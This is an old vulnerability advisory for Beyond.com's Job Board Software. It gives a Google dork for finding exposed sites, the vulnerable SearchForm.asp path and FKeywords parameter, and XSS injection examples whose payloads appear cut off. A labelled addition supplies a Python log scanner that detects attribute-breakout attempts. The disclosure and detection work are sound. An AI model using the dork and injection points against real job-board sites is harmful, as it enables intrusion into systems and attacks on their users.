+=============================================================================+
+ Job Board Software ALL Versions XSS & RFI Multiple Remote Vulnerabilities +
+=============================================================================+

Author(s): Ivan Sanchez & Maximiliano Soler.
Product: Job Board Software.
Web: http://www.beyond.com/
Versions: ALL Versions
Copyright 2001-2008 Beyond.com.
Date: 11/02/2008

GOOGLE DORKS:
------------
[+] inurl:"/JS/Form/SearchForm.asp"

EXPLOIT:
--------
http://www.[DOMAIN].tld/JS/Form/SearchForm.asp

Name External Variable= Keyword Type
Name Internal Variable= FKeywords

[1]- Example form:
Keyword Type = ">

[2]- Tampering Attack:
FKeywords=">

[3]- More XSS / RFI found in this application.

NULL CODE SERVICES [ www.nullcode.com.ar ]
Hunting Security Bugs!

--
Maximiliano Soler.
Reports & Review Code.
Null Code Services.
www.nullcode.com.ar
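
Added example (not part of the original advisory, and not the vendor's code): a log check that flags requests to the search form whose FKeywords value carries the characters needed to break out of an HTML attribute. The path and parameter name come from the advisory; the combined log format, the GET delivery and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Path and parameter name are taken from the advisory; the rest is assumed.
TARGET_PATH = "/js/form/searchform.asp"
PARAM = "fkeywords"
BREAKOUT = re.compile(r'["<>]')  # closes an attribute value or opens a tag
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding (bounded) so %2522 is seen as a quote."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line):
    """Return (name, decoded value) pairs for FKeywords values with markup."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if url.path.lower() != TARGET_PATH:  # IIS paths are case-insensitive
        return []
    hits = []
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        if name.lower() != PARAM:
            continue
        for v in map(decode_fully, values):
            if BREAKOUT.search(v):
                hits.append((name, v))
    return sorted(hits)

def scan(lines):
    """Return (line index, hits) for every line with at least one hit."""
    results = ((i, suspicious_params(line)) for i, line in enumerate(lines))
    return [(i, hits) for i, hits in results if hits]

# Constructed sample lines, not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Feb/2008:10:00:01 +0000] "GET /JS/Form/SearchForm.asp?FKeywords=nurse HTTP/1.1" 200 5120',
    '192.0.2.11 - - [11/Feb/2008:10:00:07 +0000] "GET /JS/Form/SearchForm.asp?FKeywords=%22%3Etest HTTP/1.1" 200 5144',
    '192.0.2.12 - - [11/Feb/2008:10:00:09 +0000] "GET /js/form/searchform.asp?fkeywords=%2522%253Etest HTTP/1.1" 200 5144',
    '192.0.2.13 - - [11/Feb/2008:10:00:12 +0000] "GET /index.asp?FKeywords=%22%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_LOG):
        print(index, hits)
```

Access logs normally omit POST bodies, so a form submitted by POST needs the same check applied at a WAF or inside the application. Detection does not replace the fix, which is to HTML-encode FKeywords wherever the page writes it back.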